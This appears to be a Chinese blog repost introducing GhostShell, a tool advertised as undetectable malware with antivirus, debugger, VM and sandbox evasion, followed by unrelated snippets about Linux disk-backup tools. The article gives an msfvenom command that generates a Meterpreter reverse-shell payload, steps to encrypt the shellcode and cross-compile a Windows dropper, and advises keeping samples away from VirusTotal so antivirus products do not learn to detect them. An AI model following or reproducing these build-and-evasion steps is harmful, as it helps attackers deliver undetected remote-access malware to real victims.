linux类似ghost的工具,GhostShell:一款带有AV绕过和反分析技术的恶意软件研究工具...

最新推荐文章于 2024-03-12 15:47:51 发布
最新推荐文章于 2024-03-12 15:47:51 发布
阅读量460 收藏
点赞数
文章标签: linux类似ghost的工具

GhostShell是一款专为恶意软件研究人员设计的工具,首先它是无法被检测到的,自带有反病毒产品绕过技术,并且无法进行反汇编分析。同时在这个恶意软件中,它还使用了某些技术来绕过反病毒产品、虚拟机和沙箱环境。

f70c107158bd8f2870744b6c4a5ee824.png注意事项

为了保证反病毒产品无法检测到GhostShell,请不要将生成的样本发送至VirusTotal。如果想要检测GhostShell,可以将其发送至https://www.hybrid-analysis.com/,别忘了勾选“Do not send my sample to non-affiliated third parties”选项(不要将我的样本发送给第三方厂商)。

工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地,然后进行代码编译:git clone https://github.com/ReddyyZ/GhostShell.git

绕过技术

反调试器

为了尝试绕过调试器的分析,GhostShell在这里使用了Windows.h库中的IsDebuggerPresent()方法来判断当前是否有代码调试器正在运行。

反虚拟机/反沙箱环境/反AV

1、 进程枚举功能

GhostShell可以枚举出当前操作系统中所有正在运行的进程,然后将进程列表与黑名单中的进程名称进行对比,如果找到了匹配的进程,则返回识别标识符“-1”。

2、 休眠加速检测功能

首先,GhostShell会尝试获取当前时间,然后休眠两分钟。接下来,并再次尝试获取时间,然后进行对比。如果时间差小于2,则返回识别标识符“-1”。

3、 MAC地址检测功能

获取系统MAC地址,并与黑名单中的MAC地址进行比对,如果检测到了匹配项,则返回识别标识符“-1”。

生成ShellCode

如需生成ShellCode,你需要在命令行终端窗口中输入下列命令:msfvenom -p windows/meterpreter/reverse_shell lhost=(IP) lport=(PORT) -f c

接下来,你需要拷贝生成的ShellCode,然后对其进行加密处理。

在加密时,你需要使用encrypt_shellcode脚本。

在Linux平台上,请运行下列命令:./encrypt_shellcode e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(shellcode)""

在Windows平台上,请运行下列命令:encrypt_shellcode.exe e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(YOUR_SHELLCODE)""

如何在Linux编译Windows端恶意软件

如果你需要在Linux系统中编译适用于Windows平台的GhostShell程序,首先你需要运行下列命令安装mingw-w64:sudo apt-get install mingw-w64

接下来,运行下列命令编译32位代码:i686-w64-mingw32-gcc -o main.exe main.c -l psapi –static

或者,你也可以运行下列命令编译64位源码:x86_64-w64-mingw32 -o main.exe main.c -l psapi -static

许可证协议GhostShell项目的开发与发布遵循MIT开源许可证协议

项目地址GhostShell:【GitHub传送门】

参考来源

*FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

只吃回头草
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Ghost for Linux 出色的硬盘对拷工具
11-12
Ghost for Linux 出色的硬盘对拷工具   语言种类: 英文   版 本 号: V0.14 beta ISO   文件大小: 10163 K   系统平台: Linux   软件厂商: frastep   软件主页: https://sourceforge.net/projects/g4l   软件介绍: 一个出色的硬盘对拷工具,它可以把一个磁盘上的全部内容复制到另外一个磁盘上,也可以把磁盘内容复制为一个磁盘的镜像文件,以后你可以用镜像文件创建一个原始磁盘的拷贝。它可以最大限度地减少你每次安装操作系统的时间,如果你有好几台配置相似的机器需要安装系统,你会发现使用GHOST使事情变得十分简单。 
linux上实现类似window的ghost功能
jason_czm的博客
09-19 1232
参考如下链接: http://blog.csdn.net/shendl/article/details/7384755
Linux系统快速自动安装配置(类似ghost)
weixin_34418883的博客
12-31 350
一、系统快速自动安装配置(类似ghost) 准备: 硬件:Linux系统,空白硬盘 软件:安装脚本(sysInstall.sh), 安装模板(sysInstaller.tgz) l 对于空白系统,通过硬盘/光盘/闪盘启动母系统,只需执行一个命令,即可完成系统所有的安装配置 l 安装的模版系统可以在本地...
Ghost4Linux
01-23
克隆Linux系统,一个出色的硬盘对拷工具,它可以把一个磁盘上的全部内容复制到另外一个磁盘上,也可以把磁盘内容复制为一个磁盘的镜像文件,以后你可以用镜像文件创建一个原始磁盘的拷贝。它可以最大限度地减少你每次安装操作系统的时间,如果你有好几台配置相似的机器需要安装系统,你会发现使用GHOST使事情变得十分简单.
正宗的Linux版赛门铁克GHOST 12,与Win版DOS版一模一样
11-16
Linux下唯一可以处理gho备份文件的软件,正宗的铁门塞克官方版GHOST,界面和操作跟 Windows 版、DOS版一模一样。这个deb包适用于 ubuntu 16.04 LTS 64位版本,依赖包很少,安装后系统菜单中会出现ghost的图标。
GhostShell:借助AV旁路技术拆卸等功能,无法检测到恶意软件
03-21
在此恶意软件中,使用了一些技巧来绕过AV,VM和沙盒,而只是为了了解更多而已。我对您的行为不承担任何责任。 | || :warning:注意!!! 要检查防病毒软件是否检测到该恶意软件,切勿将其发送给病毒库,它将被发送...
系统备份ghostshell_v2.0.rar
05-15
GhostShell_v2.0是一款基于GHOST技术的系统备份与恢复软件,GHOST全称为General Hardware Oriented Software Transfer,即通用硬件导向软件传输,是Symantec公司开发的一款强大的磁盘克隆和备份工具GhostShell_v...
Ghost shell v2.0 系统备份工具
12-10
完美的系统备份工具,不用担心系统中毒后重装系统了!
备份还原系统工具v2.0 (GhostShellv2.0)
03-02
篮球梦音乐心 (c) 维修技术联盟 程序大小:3.06 MB 应用平台:WinNT Win2000 WinXP Win2003 <br>一、程序简介: <br> 备份还原系统工具(GhostShell)是能在 Windows 下对任意分区一键备份或恢复(以 ...
做封装GHOST半安装版的XP系统
03-21
### 做封装GHOST半安装版的XP系统详解 #### 一、概述 随着计算机技术的发展,系统安装方式也在不断进化。其中一种常见的安装方式就是通过GHOST半安装版来实现快速部署Windows XP系统。这种方法结合了完整安装与...
clonezilla-live-20191024-eoan-amd64.iso
01-07
Clonezilla,中文名再生龙,是一个用于系统备份和还原的工具类似Ghost,但它是开源、免费的。
linux备份与还原系统(类似window上ghost备份还原)
wyj372的专栏
07-31 7023
linux 系统的备份和恢复,类似window上的ghost操作 ,再生龙Clonezilla("再生龙")+2个u盘+ulstra
linux系统做gost镜像,linux下如何像ghost一样备份系统
weixin_30895121的博客
04-28 2330
Windows下Ghost可以克隆整个系统的镜像,然后在新的电脑上恢复,相当简单。Ghost安装系统比使用安装镜像安装要快的多,因为Ghost磁盘存储是连续的,且安装过程中不需要回答任何问题。为什么不能使用Ghost来备份和恢复linux系统呢?因为Ghost只能识别很少老旧的lunux文档系统,其无法识别grub和LILO等引导加载进程。其实linux下有个著名的g4l—ghostForlinu...
linux磁盘镜像技术,Linux 下使用 dd 和 gzip 命令来代替 Ghost 做磁盘镜像
Wang20122013的博客
02-18 4387
1.使用 dd 和 gzip 命令来代替 Ghost 做磁盘镜像 在 Linux 下,其实可以使用 dd 和 gzip 命令来代替 Ghost 做磁盘镜像。 要使用 dd 和 gzip 备份,可以执行命令: dd if=/dev/sda status=progress| gzip -c > sda.dd.gz 也可以不用压缩命令 dd if=/dev/sda status=progress bs=32M > sda.dd.gz bs的添加非常重要,可以提升速度 在还原时,可以执行下列命令: g
可以替代Ghost的系统备份/恢复利器Clonezilla
Jingle的专栏
08-28 6886
发表于 2010-6-20 22:50:30 Ghost很流行,很多人在用,用它来备份微软的系统还是挺不错的,但对于非微软系统,就不那么好了。 主要的问题体现在兼容性方面,你可以用它来备份Mac OS X的日志式HFS+分区,但还原时它就不再是原来的那个日志式HFS+分区了,因为Ghost只支持HFS分区(HFS+分区的上一个版本)。另外它对Linux的支持也不是很好,因为较新版本的Linux
linux系统GHOST备份方案(运维工程师必备技能)
最新发布
2301_79009758的博客
03-12 3402
Windows系统备份可以用ghost工具软件完成,Linux系统不能完全依赖于ghost工具,一则是ghost本身是有版权的软件,二则ghost只支持ext2、ext3文件系统的Linux分区,不支持reiserfs、xfs等比较高级的文件系统,ghost本身并不备份mbr,因此常造成恢复后的系统grub出错的问题。可能是由于晚上上网的原因,partition image官方网站一直上不去,没有下载,在此不继续做使用讨论,以屏幕截图来看,此款软件好于g4l。3,把目标盘分成一个区,建立EXT3文件系统。
gost备份linux系统,linux系统GOST备份教程.doc
weixin_35126200的博客
05-13 220
linux系统GOST备份教程linux系统GHOST备份Windows系统备份可以用ghost工具软件完成,Linux系统不能完全依赖于ghost工具,一则是ghost本身是有版权的软件,二则ghost只支持ext2、ext3文件系统的Linux分区,不支持reiserfs、xfs等比较高级的文件系统,ghost本身并不备份mbr,因此常造成恢复后的系统grub出错的问题。  linux本身自带...
克隆整个linux系统环境的软件,开源的系统克隆工具 Clonezilla(再生龙)linux、UBUNTU备份不用愁...
weixin_33128371的博客
05-03 1579
Clonezilla是一个很好的系统克隆工具,它基于Partimage,吸取了Norton Ghost和Partition Image的优点。即不仅支持对整个系统进行克隆,而且也可以克隆单个的分区,这种灵活性可能更能适应备份者的需要。支持GNU/Linux的文件系统 ext2、ext3、reiserfs、xfs、jfs和Windows的FAT、FAT32、NTFS文件系统。Clonezilla支持...
Linux物理机系统备份工具再生龙和TimeShift使用教程
weixin_44330367的博客
07-19 4798
Ubuntu物理机系统备份工具TimeShift使用教程
linux pxe工具,基于PXE方式的Linux系统维护工具
weixin_39701288的博客
05-07 611
基于PXE方式的Linux系统维护工具箱在安装RedHat Linux系统的过程中,我们知道可以通过PXE方式进行安装,从而解决了无光驱或无安装介质(光盘)来安装操作系统。但是当系统由于某种原因导致系统崩溃的问题,在这个时候首先要想到的是试图修复,而不是直接重装操作系统。因为在大多数的情况下,我们都可以通过系统维护工具来完成修复。本文主要介绍如何制作基于PXE方式的系统维护工具箱。一、系统维护工具...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值